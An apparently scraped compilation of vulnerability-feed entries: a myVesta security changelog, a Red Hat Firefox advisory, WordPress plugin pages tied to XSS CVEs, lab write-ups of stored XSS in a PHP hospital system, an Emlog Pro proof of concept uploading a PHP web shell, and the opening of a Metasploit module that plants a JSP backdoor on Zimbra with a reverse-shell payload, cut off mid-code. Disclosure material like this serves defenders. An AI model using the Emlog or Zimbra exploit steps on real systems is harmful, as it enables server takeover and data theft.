myVesta Control Panel before 0.9.8-26-43 and Vesta Control Panel before 0.9.8-26 are vulnerable to command injection. An authenticated and remote administrative user can execute arbitrary commands via the v_sftp_license parameter when sending HTTP POST requests to the /edit/server endpoint.

*   \[Security\] fix for: CSRF remote code execution in UploadHandler.php - CVE-2021-28379 (Credits to: Fady Osman @fady\_othman)
*   \[Security\] fix for: Local privilege escalation from user account to admin account user via v-add-web-domain (Credits to: Two independent security researchers, Marti Guasch Jiménez and Francisco Andreu Sanz, working with the SSD Secure Disclosure program) (and also thanks to HestiaCP @hestiacp for fix)
*   \[Security\] fix for: Local privilege escalation in v-generate-ssl-cert (potential user to admin or root escalation) (Credits to: Numan Türle @numanturle, thanks to HestiaCP @hestiacp for fix)
*   \[Security\] fix for: Local privilege escalation in /web/api/ via v-make-tmp-file (probably admin to root escalation) (Credits to: Numan Türle @numanturle, thanks to HestiaCP @hestiacp for fix)
*   \[Security\] fix for: Cross site scripting in /web/add/ip/ (admin to other admin XSS escalation) (Credits to: Numan Türle @numanturle, thanks to HestiaCP @hestiacp for fix)
*   \[Security\] fix for: Admin to root escalation in v-activate-vesta-license (Credits to: Numan Türle @numanturle)
*   \[Security\] Ensure HTML will not be displayed in list log page (Credits to: Kristan Kenney @kristankenney, thanks to HestiaCP @hestiacp for fix)

CVE-2021-46850: Release Version 0.9.8-26-43 · myvesta/vesta

Red Hat Security Advisory 2022-7071-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.4.0 ESR. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:7071-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7071  
Issue date:        2022-10-20  
CVE Names:         CVE-2022-42927 CVE-2022-42928 CVE-2022-42929  
                   CVE-2022-42932  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.4.0 ESR.

Security Fix(es):

* Mozilla: Same-origin policy violation could have leaked cross-origin URLs  
(CVE-2022-42927)

* Mozilla: Memory Corruption in JS Engine (CVE-2022-42928)

* Mozilla: Denial of Service via window.print (CVE-2022-42929)

* Mozilla: Memory safety bugs fixed in Firefox 106 and Firefox ESR 102.4  
(CVE-2022-42932)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2136156 - CVE-2022-42927 Mozilla: Same-origin policy violation could have leaked cross-origin URLs  
2136157 - CVE-2022-42928 Mozilla: Memory Corruption in JS Engine  
2136158 - CVE-2022-42929 Mozilla: Denial of Service via window.print  
2136159 - CVE-2022-42932 Mozilla: Memory safety bugs fixed in Firefox 106 and Firefox ESR 102.4

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
firefox-102.4.0-1.el9_0.src.rpm

aarch64:  
firefox-102.4.0-1.el9_0.aarch64.rpm  
firefox-debuginfo-102.4.0-1.el9_0.aarch64.rpm  
firefox-debugsource-102.4.0-1.el9_0.aarch64.rpm

ppc64le:  
firefox-102.4.0-1.el9_0.ppc64le.rpm  
firefox-debuginfo-102.4.0-1.el9_0.ppc64le.rpm  
firefox-debugsource-102.4.0-1.el9_0.ppc64le.rpm

s390x:  
firefox-102.4.0-1.el9_0.s390x.rpm  
firefox-debuginfo-102.4.0-1.el9_0.s390x.rpm  
firefox-debugsource-102.4.0-1.el9_0.s390x.rpm

x86_64:  
firefox-102.4.0-1.el9_0.x86_64.rpm  
firefox-debuginfo-102.4.0-1.el9_0.x86_64.rpm  
firefox-debugsource-102.4.0-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42927  
https://access.redhat.com/security/cve/CVE-2022-42928  
https://access.redhat.com/security/cve/CVE-2022-42929  
https://access.redhat.com/security/cve/CVE-2022-42932  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY1G2AdzjgjWX9erEAQihqA/9HQjFQvkMDXh/mKcrvWv6IA+4YTctJjba  
bYwsaRqtdldbOOtiCxzK99u7bRnlJ9eC+gUPULk9gYcfk/JdzC9inzo+7HiLxv1y  
FB5UzuMtLdrKMLMe8hAbgkA6/0/zXBLx/8ZAY7gMiKZ8m59QOeXLst84+Q/uXg2O  
fw3fEBY8w7PbIKamhNJR0FvgjslA12YhlYuY05SckSxf52klA041wMrXQVwMTrd6  
2yYXITXL14xzo3wuee3ebAmEgz1BztGStdyxAEm6m5sAxXiCxLucXVabTDUCP2dZ  
r9eQoh35s17pbcRtajGRv4wUcMUKvspwf0FKm6CKT2ysCI9DbQ1/4OLAErf5m1b2  
4TD51Z9Ctnjfd53NImtRh0uePMxHh7YgWXRdLCo3K0W9AvUI5j6cccTFyGCxUNsG  
pRBNkvQgQ/LaSb3343z1MmVTtLKEt8JwrZUt8nFPloCc3/F/+iySlMiXK7WFA4L3  
4uUOdBKHzJFCpTIj2W+K1W2gd9nvmSu64Ph9F/WvEUjMzU+8oyXNP0gRvONJEl8i  
NytBnh37ZTx2dYmul3HFGZa2ykHGpTbUz2Nejbj9pHpe0gXTBM2PGfXjV93p6H0+  
NnP1mDOCYL7G0WmEjGLKm6mHNbPK5tMXDU5arAysgvLg07A7uW6v5BN+LRfwCp2D  
HaPTBUgQExg=Y5iw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7071-01

Auth. (admin+) Stored Cross-Site Scripting (XSS) in Fatcat Apps Analytics Cat plugin <= 1.0.9 on WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Analytics Cat – Google Analytics is a lean, fast, simple, no-frills way to add your Google Analytics / Universal Google Analytics code to your WordPress site.

This bloat-free, simple Google Analytics WordPress plugin doesn’t add tons of features. Instead, Analytics Cat – Google Analytics simply focuses on letting you add your Google Analytics (Universal Analytics) Code to your site in less than 2 minutes, without slowing your site down.

**Which features does Analytics Cat – Google Analytics have?**

*   Add the Google Analytics (Universal Analytics) tracking code to your WordPress site with ease.
*   Hide your Google Analytics tracking code from logged-in users so you don’t pollute your data.

**How to use Analytics Cat – Google Analytics?**

There are multiple ways to add the Google Analytics tracking code to your WordPress site.

**1\. Pasting your Google Analytics script into your theme**  
This approach isn’t great for two reasons:  
a) If you edit your live site and make a mistake when pasting your Google Analytics script into your theme, you could take down your website.  
b) If your theme is updated with new features or security fixes, your Google Analytics code will be overwritten.

**2\. Pasting your Google Analytics script into a header/footer script plugin**  
This is a valid approach, but has some disadvantages. General purposes “header script plugins” aren’t built from the ground-up to support Google Analytics.

What this means is that :  
a) These plugins lack Google Analytics-specific functionality.  
b) These plugins will not adapt if Google Analytics changes again. Since Analytics Cat is a dedicated Google Analytics WordPress plugin, we’ll make sure make sure to stay compatible with future changes to Google Analytics.  
c) These plugins usually don’t support hiding your Google Analytics code from logged-in users.

**3\. Using Some Other Google Analytics WordPress Plugin**  
There are some good Google Analytics plugins out there, but many of them are bloated, have too many settings and are slow.

You’ll love Analytics Cat – Google Analytics Cat iff what you want is a simple, reliable Google Analytics plugin,

**Does Analytics Cat – Google Analytics Plugin work with Universal Analytics?**

Yes. Analytics Cat is built from the ground up to support Universal Analytics.

Analytics Cat – Google Analytics does not work with the old Google Analytics script that Google deprecated.

**Can I hide my Google Analytics tracking code from logged in users?**

Yes. You can hide your Google Analytics code from logged in users by going to Settings -> Google Analytics Manager.

**Is Analytics Cat – Google Analytics easy to translate?**

Yes. Analytics Cat – Google Analytics Cat is fully translateable. Please let us know if you’re interested in contributing.

**Analytics Cat – Google Analytics Feature Roadmap**

This is just the first version of Analytics Cat – we have tons of new features & improvements lined up. Do you have any suggestions? Please leave a comment in the support forums.

—The Fatcat Apps Team

**Privacy Disclosure**

This plugin can be configured to connect to 3rd party service providers such as Google.

If you use this plugin to connect to a 3rd party, personal data may also be shared with that party.

Additional privacy policy information for 3rd party services can be found here:

Google

Our full privacy policy is available here: https://fatcatapps.com/legal/privacy-policy/

*   Analytics Cat - Google Analytics for WordPress settings screen
    

1.  Upload the Analytics Cat – Google Analytics plugin file (fca-ga.zip) to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  In your sidebar, select ‘Settings -> Google Analytics Manager’ to add your tracking code.

**How do I set up Google Analytics using Analytics Cat?**

After installing this plugin, simply go to Settings -> Google Analytics Manager and add your Google Analytics (Universal Analytics) ID.

**What is my Google Analytics tracking ID?**

Follow these steps to find your Google Analytics tracking id:

1.  Sign in to your Google Analytics account
    
2.  On the bottom left side of the screen, click on “Admin” (Cog icon).
    
3.  Select your preferred Account and Property from the columns.
    
4.  Under Property, Click ‘Tracking Info’ > ‘Tracking Code’
    
5.  You will find your Tracking ID here (example: UA-xxxxxx-01)
    
6.  Paste this Tracking ID into Analytics Cat
    

Important: Do not paste your tracking code (starting with ). Instead, paste your tracking id (example: UA-xxxxxx-01) into Analytics Cat.

**Can I anonimize ip addresses?**

Yes you can! Append the following code to your theme’s functions.php page:

    function my_custom_ga_attributes ( $value ) {
        return '&aip=1';
    }
    
    add_filter( 'fca_ga_attributes', 'my_custom_ga_attributes' );
    

For more information, read this: How to find your Google Analytics tracking code, Google Analytics tracking ID, and Google Analytics property number

This plugin works well and does what it's supposed to do without issues.

Does what it says. Simple and easy to setup.

No extra fluff makes me tear up in joy. Thank you for staying true to the description and point. 👏

I have used this plugin to get input/insights for my ActiveCampaign marketing tool. It does exactly what it says it does, reliably.

It works really well but I deducted a star because I have started getting spam after installing it. Prior to this I was receiving none and this is the only plugin I have installed in the last three months.

Read all 11 reviews

“Analytics Cat – Google Analytics Made Easy” is open source software. The following people have contributed to this plugin.

Contributors

**Analytics Cat – Google Analytics 1.1.1**

*   Improved notices
*   Changed default role exclusion to none
*   Fix potential empty value error reported
*   Remove unused API calls

**Analytics Cat – Google Analytics 1.1.0**

*   Improved security for Editor page
*   Tested up to WordPress 5.9.1

**Analytics Cat – Google Analytics 1.0.9**

*   Updated feedback form
*   Tested up to WordPress 5.6.2

**Analytics Cat – Google Analytics 1.0.8**

*   Fixed double tracking issue

**Analytics Cat – Google Analytics 1.0.7**

*   Tested up to WordPress 5.5

**Analytics Cat – Google Analytics 1.0.6**

*   Added filter fca\_ga\_attributes to add ability to customize enqueued script attributes (see readme)
*   Admin UI text update
*   Removed quotes from Google Analytics ID ( fixed issue with 3rd party add-on )
*   Tested up to WordPress 5.4.2

**Analytics Cat – Google Analytics 1.0.5**

*   Upgraded from analytics.js to gtag.js
*   Tested up to WordPress 5.4.1

**Analytics Cat – Google Analytics 1.0.4**

*   Load Select2 library locally instead of via CDN
*   Add privacy disclosure

**Analytics Cat – Google Analytics 1.0.3**

*   Removed installation splash screen

**Analytics Cat – Google Analytics 1.0.2**

*   Add settings saved message
*   Update help text & links
*   Update permissions text

**Analytics Cat – Google Analytics 1.0.1**

*   Fix link to quick start guide in admin UI

**Analytics Cat – Google Analytics 1.0.0**

*   Release candidate 1 of Analytics Cat – Google Analytics

CVE-2022-40311: Analytics Cat – Google Analytics Made Easy

Auth. Stored Cross-Site Scripting (XSS) in Pop-Up Chop Chop plugin <= 2.1.7 on WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**OVERVIEW**

Pop-Up Chop Chop plugin brings unlimited pop-ups with easily customizable professional templates. Each template comes in **two sizes** (big and small). The pop-ups are **fully responsive** and work with any WordPress theme.

With Pop-Up Chop Chop 2.0 you can create **any number** of input fields and collect your visitors’ emails, names, phone numbers…

Pop-Up Chop Chop is a perfect solution to capture the audience’s attention in the right time and place to build your mailing list.

**CUSTOMIZATION**

Pop-Up Chop Chop allows you to build elegant and professional pop-ups in a couple of minutes. Create attractive content and the pop-ups matching your website’s design. Preview your changes live while editing the content in our custom visual editor. Decide when the visitors see your pop-up – set the time and display the pop-up exactly when and where you want to.

**Features:**

*   Unlimited pop-up number
*   Multiple input fields (drag & drop ordering)
*   Neat designs
*   6 elegant and professional pop-up templates
*   Two pop-up sizes (big and small)
*   Responsive pop-up themes
*   Retina-friendly
*   Quick and easy pop-up setup
*   User-friendly interface
*   Smooth and swift admin panel
*   Highly customizable content
*   Email notifications
*   Turn on/off the pop-ups on mobile devices

**Using The WordPress Dashboard**

1.  Navigate to the ‘Add New’ in the plugins dashboard
2.  Search for ‘pop-up’
3.  Click ‘Install Now’
4.  Activate the plugin on the Plugin dashboard
5.  Go to PopUp in the left menu to manage the pop-ups

**Uploading in WordPress Dashboard**

1.  Navigate to the ‘Add New’ in the plugins dashboard
2.  Navigate to the ‘Upload’ area
3.  Select pop-up from your computer
4.  Click ‘Install Now’
5.  Activate the plugin in the Plugin dashboard
6.  Go to PopUp in the left menu to manage the pop-ups

**Using FTP**

1.  Download ‘pop-up’
2.  Extract the ‘pop-up’ directory to your computer
3.  Upload the ‘pop-up’ directory to the ‘/wp-content/plugins/’ directory
4.  Activate the plugin in the Plugin dashboard
5.  Go to PopUp in the left menu to manage the pop-ups

**1\. How do I add custom fields to my pop-up?**

Follow the Custom Fields Manual to learn how to add new fields to your contact form.

**2\. Questions? Comments?**

Contact talk@chop-chop.org if you have any questions or wish to provide feedback.

Possibilité de relier à MailChimp en version Pro. Vraiment très simple à utiliser et paramétrer.

I went thru all free pop-up plugins out there and everyone of them was really bad - hard to configure, not responsive or just ugly. Pop-up CC is easy to setup and looks awesome. Premium version has more options, but free is still very good - you can use all the templates etc. I had and issue tho with plugin not sending notifications about new subscribers so wrote about it to the creators and they responded very fast, helping me fix it. It works as intended now. Thanks!

Great plugin design and functionality. I had some difficulty setting it up - based on a lack of developer knowledge, but their support team were fantastic and responded to my query within hours. They went above ad beyond to get me set up and now I'm on my way there's no looking back. Can't recommend highly enough - keep up the great work.

Good and quite simple to use. Poor documentation, you have to try to understand some option.

Read all 16 reviews

“Pop-Up Chop Chop” is open source software. The following people have contributed to this plugin.

Contributors

*    Chop Chop

**2.1.7**

WordPress 5.5.1 and PHP 7.4 compatibility  
FIX: Minor php and css errors

**2.1.6**

WordPress 5.4.2 compatibility  
FIX: Input error message

**2.1.5**

WordPress 5.4.1 compatibility  
PHP 7.4 compatibility

**2.1.3**

FIX: Admin responsive css  
UPDATE: Tested with 4.9.2

**2.0.9**

Change load time

**2.0.8**

Cleanup

**2.0.6**

ADD: close on overlay click

**2.0.5**

ADD: style select to wysywig editor

**2.0.4**

Delete: old live preview fields

**2.0.3**

ADD: missing files in wordpress repo

**2.0.2**

ADD: missing files in wordpress repo

**2.0.1**

UPDATE: add newsletter metabox file

**1.4.1**

FIX: wordpress help tabs

**1.4.0**

ADD: CMB upgrade

**1.3.5**

FIX: “disable on” list

**1.3.4**

FIX: Templates css

**1.3.3**

ADD: woocommerce products to “disable on” list

**1.3.2**

FIX: background image uploader

**1.3.0**

ADD: woocommerce pages to “disable on” list

**1.2.5**

FIX: Customize button

**1.2.4**

FIX: Templates css

**1.2.3**

FIX: Google fonts

**1.2.2**

ADD: Jquery Cookies new version

**1.2.1**

FIX: Templates css

**1.2.0**

FIX: Templates css

**1.1.6**

FIX: Templates css

**1.1.5**

ADD: Close timeout option  
FIX: Templates css

**1.1.4**

FIX: Templates css  
FIX: Wysiwyg editor

**1.1.3**

ADD: Field label

**1.1.2**

ADD: “Thank you” message edit option

**1.1.1**

ADD: intro/outro fade  
ADD: New thumbnails  
FIX: Newsletter section

**1.1.0**

FIX: Admin ajax  
ADD: Speed optimization

**1.0.9**

FIX: Templates css

**1.0.8**

ADD: Cookie option  
FIX: Templates css  
ADD: Admin panel enhancements

**1.0.7**

FIX: Templates css

**1.0.6**

FIX: Wysiwyg editor

**1.0.5**

ADD: Field label  
FIX: Button css

**1.0.4**

FIX: headers  
FIX: mobile templates

**1.0.3**

FIX: Templates css

**1.0.2**

FIX: Templates css  
ADD: “Show once per session” option  
ADD: Auto close the pop-up after the sign-up

**1.0.1**

Fix: newsletter signup form

**1.0.0**

First release

CVE-2022-41638: Pop-Up Chop Chop

PHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via add-patient.php.

**Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #2**

**Cross site scripting in Hospital Management System Gurukul v4.0 Heading link**

Multiple **stored cross site scripting vulnerabilities** are present in Hospital Management System Gurukul v4.0

In the **add-patient.php** file, several **POST** **parameters** are directly used into the INSERT SQL query without any kind of escaping or sanitization.

      /\* ... \*/

if(isset($\_POST\['submit'\]))
{
    $docid=$\_SESSION\['id'\];
    $patname=$\_POST\['patname'\];
    $patcontact=$\_POST\['patcontact'\];
    $patemail=$\_POST\['patemail'\];
    $gender=$\_POST\['gender'\];
    $pataddress=$\_POST\['pataddress'\];
    $patage=$\_POST\['patage'\];
    $medhis=$\_POST\['medhis'\];
    $sql=mysqli\_query($con,"insert into tblpatient(Docid,PatientName,PatientContno,PatientEmail,PatientGender,PatientAdd,PatientAge,PatientMedhis)
values('$docid','$patname','$patcontact','$patemail','$gender','$pataddress','$patage','$medhis')");

      /\* ... \*/

In the **admin/manage-patients.php**, **doctor/manage-patient.php**, **doctor/view-patient.php**, **admin/view-patient.php** and **view-medhistory.php** files, the data that was inserted by the above-mentioned query is retrieved from the database and added to the current page.

      /\* Example from doctor/view-patient.php\*/

$vid=$\_GET\['viewid'\];
$ret=mysqli\_query($con,"select \* from tblpatient where ID='$vid'");
$cnt=1;
while ($row=mysqli\_fetch\_array($ret)) {

    /\* ... \*/
    echo $row\['PatientName'\];
    /\* ... \*/
    echo $row\['PatientEmail'\];
    /\* ... \*/
    echo $row\['PatientContno'\];
    /\* ... \*/
    echo $row\['PatientContno'\];
    /\* ... \*/
    echo $row\['PatientAdd'\];
    /\* ... \*/
    echo $row\['PatientGender'\];
    /\* ... \*/
    echo $row\['PatientMedhis'\];
    /\* ... \*/
    echo $row\['CreationDate'\];
    /\* ... \*/

The vulnerable parameters through which the attack can be carried out are **patname**, **patemail**, **gender**, **pataddress** and **medhis** POST parameters.  
The following is one of the possible exploitation using the **medhis POST parameter**.

POST /hospitalmanagementsystemproject4/hospital/hms/doctor/add-patient.php HTTP/1.1
Host: localhost
Content-Length: 180
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/hospitalmanagementsystemproject4/hospital/hms/doctor/add-patient.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=lrqh66ialqjgfot5rcq90bnvjj
Connection: close

patname=Name4&patcontact=3124432845&patemail=Name3%40mail.com&gender=male&pataddress=3021+Halsted+St%2C+Chicago&patage=40&medhis=\[url-encoded-script\]&submit=

An attacker can easily inject malicious Javascript into the database and steal session cookies from users and administrators.

These vulnerabilities were found using the NAVEX project developed at SISL lab in UIC.

CVE-2022-42205: Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #2 | Systems and Internet Security Lab

PHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via doctor/view-patient.php, admin/view-patient.php, and view-medhistory.php.

**Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #3**

**Cross site scripting in Hospital Management System Gurukul v4.0 Heading link**

Multiple **stored cross site scripting vulnerabilities** are present in Hospital Management System Gurukul v4.0

The files **doctor/view-patient.php**, **admin/view-patient.php** and **view-medhistory.php** share a common piece of code where several **POST** **parameters** are directly used into the INSERT SQL query without any kind of escaping or sanitization.

    /\* ... \*/

if(isset($\_POST\['submit'\]))
{

    $vid=$\_GET\['viewid'\];
    $bp=$\_POST\['bp'\];
    $bs=$\_POST\['bs'\];
    $weight=$\_POST\['weight'\];
    $temp=$\_POST\['temp'\];
    $pres=$\_POST\['pres'\];

    $query.=mysqli\_query($con,"insert tblmedicalhistory(PatientID,BloodPressure,BloodSugar,Weight,Temperature,MedicalPres) 
value('$vid','$bp','$bs','$weight','$temp','$pres')");

    
    /\* ... \*/

In the same files, the data that was inserted by the above-mentioned query is retrieved from the database and added to the current page.

      
    /\* ...\*/

while ($row=mysqli\_fetch\_array($ret)) { 

    echo $cnt;
    echo $row\['BloodPressure'\];
    echo $row\['Weight'\];
    echo $row\['BloodSugar'\];
    echo $row\['Temperature'\];
    echo $row\['MedicalPres'\];
    echo $row\['CreationDate'\];

    /\* ... \*/

The vulnerable parameters through which the attack can be carried out are **bp**, **bs**, **weight**, **temp** and **pres** POST parameters.  
The following is one of the possible exploitation using the **pres POST parameter**.

POST /hospitalmanagementsystemproject4/hospital/hms/doctor/view-patient.php?viewid=3 HTTP/1.1
Host: localhost
Content-Length: 94
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/hospitalmanagementsystemproject4/hospital/hms/doctor/view-patient.php?viewid=3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=lrqh66ialqjgfot5rcq90bnvjj
Connection: close

bp=120%2F85&bs=12&weight=70kg&temp=36&pres=\[url-encoded-script\]&submit=

An attacker can easily inject malicious Javascript into the database and steal session cookies from users and administrators.

These vulnerabilities were found using the NAVEX project developed at SISL lab in UIC.

CVE-2022-42206: Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #3 | Systems and Internet Security Lab

Emlog Pro 1.6.0 plugins upload suffers from a remote code execution (RCE) vulnerability.

    POST /emlog/admin/plugin.php?action=upload_zip HTTP/1.1
    Host: 192.168.111.155
    Content-Length: 876
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.111.155
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary804UeairFtrET9Lt
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.111.155/emlog/admin/plugin.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=lq0s731hnlqm232itjlgpc27el; EM_AUTHCOOKIE_jT79impSwTWeimzUBIsgAmv1NoQbG2Zs=admin%7C1695536025%7C848fc865191736412177851eb6082b92; em_saveLastTime=1664436503884
    Connection: close
    
    ------WebKitFormBoundary804UeairFtrET9Lt
    Content-Disposition: form-data; name="pluzip"; filename="shell.zip"
    Content-Type: application/x-zip-compressed
    
    PK���   � Mq=Ua郵/?    �  �   shell/shell.php=?K聾 嗺凔�78h嘍�2渹�v�裫]Dと??$W称��"XjQ皛Q礑??轌3?乿}哏}y��=觾@/@癴撰杻V+5倯x岹儊竲哷孁佸:�蚷?猏Z?,揱戏<氉�賬岈ノ�湞獈煶埑'R齿獙哮甙!?>靾?綱漜晅U?砭7it愴矐堬%{L�z�悏雀╊>��栮詔}岒O懘e隿�鍶趣?爱嘺ㄥ愭�
    AA噣霿扉┹Rq絓茇?cgf?PK���     Bq=U            �   shell/PK��? �   � Mq=Ua郵/?    �  � $               shell/shell.php
           � � F柑)视?F柑)视?�[秤?PK��? �     Bq=U            � $       �   *�  shell/
           � � 棦��视?�8?视?纳�爻迂�PK��    � � ?   N�    
    ------WebKitFormBoundary804UeairFtrET9Lt
    Content-Disposition: form-data; name="token"
    
    4e1bef9d513bae43a46448cbbaee0db7d1d5f7d1
    ------WebKitFormBoundary804UeairFtrET9Lt--
    
    

    http://192.168.111.155//emlog/content/plugins/shell/shell.php

CVE-2022-42189: cms_vul/emlog_pro_1.6.0_rce.md at main · wszdhf/cms_vul

This Metasploit module creates a .tar file that can be emailed to a Zimbra server to exploit CVE-2022-41352. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in the cpio command-line utility that can extract an arbitrary file to an arbitrary location on a Linux system (CVE-2015-1197). Most Linux distros have chosen not to fix it. This issue is exploitable on Red Hat-based systems (and other hosts without pax installed) running versions Zimbra Collaboration Suite 9.0.0 Patch 26 and below and Zimbra Collaboration Suite 8.8.15 Patch 33 and below.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FILEFORMAT  include Msf::Exploit::EXE  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'TAR Path Traversal in Zimbra (CVE-2022-41352)',        'Description' => %q{          This module creates a .tar file that can be emailed to a Zimbra server          to exploit CVE-2022-41352. If successful, it plants a JSP-based          backdoor in the public web directory, then executes that backdoor.          The core vulnerability is a path-traversal issue in the cpio command-          line utlity that can extract an arbitrary file to an arbitrary          location on a Linux system (CVE-2015-1197). Most Linux distros have          chosen not to fix it.          This issue is exploitable on Red Hat-based systems (and other hosts          without pax installed) running versions:          * Zimbra Collaboration Suite 9.0.0 Patch 26 (and earlier)          * Zimbra Collaboration Suite 8.8.15 Patch 33 (and earlier)          The patch simply makes "pax" a pre-requisite.        },        'Author' => [          'Alexander Cherepanov', # PoC (in 2015)          'yeak', # Initial report          'Ron Bowes', # Analysis, PoC, and module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-41352'],          ['URL', 'https://forums.zimbra.org/viewtopic.php?t=71153&p=306532'],          ['URL', 'https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/'],          ['URL', 'https://www.openwall.com/lists/oss-security/2015/01/18/7'],          ['URL', 'https://lists.gnu.org/archive/html/bug-cpio/2015-01/msg00000.html'],          ['URL', 'https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352/rapid7-analysis'],          ['URL', 'https://attackerkb.com/topics/FdLYrGfAeg/cve-2015-1197/rapid7-analysis'],          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27'],          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P34'],        ],        'Platform' => 'linux',        'Arch' => [ARCH_X86, ARCH_X64],        'Targets' => [          [ 'Zimbra Collaboration Suite', {} ]        ],        'DefaultOptions' => {          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',          'TARGET_PATH' => '/opt/zimbra/jetty_base/webapps/zimbra/',          'TARGET_FILENAME' => nil,          'DisablePayloadHandler' => false,          'RPORT' => 443,          'SSL' => true        },        'Stance' => Msf::Exploit::Stance::Passive,        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2022-06-28',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('FILENAME', [ false, 'The file name.', 'payload.tar']),        # Separating the path, filename, and extension allows us to randomize the filename        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (an absolute path - eg, /opt/zimbra/...).']),        OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: public/<random>.jsp).']),      ]    )    register_advanced_options(      [        OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (default: random)']),        OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),        # Took this from multi/handler        OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),        